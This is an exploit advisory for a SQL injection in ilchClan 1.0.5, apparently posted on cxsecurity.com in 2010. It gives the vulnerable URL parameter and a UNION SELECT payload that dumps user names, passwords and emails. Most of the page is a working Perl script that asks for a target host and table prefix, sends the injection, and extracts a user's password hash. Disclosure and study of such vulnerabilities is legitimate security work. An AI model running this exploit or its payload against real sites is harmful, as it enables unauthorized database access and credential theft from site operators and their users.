ilchClan 1.0.5 remote SQL injection

2010-04-06 / 2010-04-07
Credit: Easy Laster
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

----------------------------Information------------------------------------------------ +Name : ilchClan <= 1.0.5 SQL Injection Vulnerability & Exploit +Autor : Easy Laster +Date : 05.04.2010 +Script : ilchClan <= 1.0.5 +Download : http://www.ilch.de/downloads-show-65.html +Demo : http://easystestsite.ea.ohost.de/ +Price : for free +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/ilchClan105/?m=downloads&cid= +Exploitable : http://www.site.com/ilchClan105/?m=downloads&cid=1+and+1=0+union+select +1,concat(name,0x3a,pass,0x3a,email)+from+ilchclan_user+where+id=1-- ----------------------------------------------------------------------------------------- #Exploit #!usr\bin\perl # # ################################################## # Modules # #------------------------------------------------# use strict; # Better coding. # use warnings; # Useful warnings. # use LWP::Simple; # procedureal interface# ################################################## print " ################################################## # 4004-Security-Project # ################################################## # ilchClan <= 1.0.5 SQL Injection # # Exploit # # Using Host+Path+Userid+prefix # # demo.de /ilchclan/ 1 ilchClan # # Easy Laster # ################################################## \a\n"; my($host,$path,$userid,$request); my($first,$block,$error,$dir,$prefix); $block = " ##################################################\n"; $error = "Exploit failed"; print "$block"; print q(Target demo.de->); chomp($host =<STDIN>); if ($host eq""){ die "$error\a\n"}; print "$block"; print q(Path /path/ ->); chomp($path =<STDIN>); if ($path eq""){ die "$error\a\n";} print "$block"; print q(userid->); chomp($userid =<STDIN>); if ($userid eq""){ die "$error\a\n";} print "$block"; print q(prefix ilchClan ->); chomp($prefix =<STDIN>); if ($prefix eq""){ die "$error\a\n";} print "$block"; $dir = "?m=downloads&cid="; print "<~> Exploiting...\n"; $host = "http://".$host.$path.$dir; print "<~> Connecting...\n"; $request = get($host."1+and+1=0+union+select+1,concat(0x23,0x23,0x23,0x23,0x23,pass)+from+".$prefix."_user+where+id=".$userid."--"); $first = rindex($request,"#####"); if ($first != -1) { print "<~> Exploiting...\n"; print "$block\n"; $request = substr($request, $first+5, 32); print "<~> Hash = $request\n\r\n\a"; } else { print "<~> $error"; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top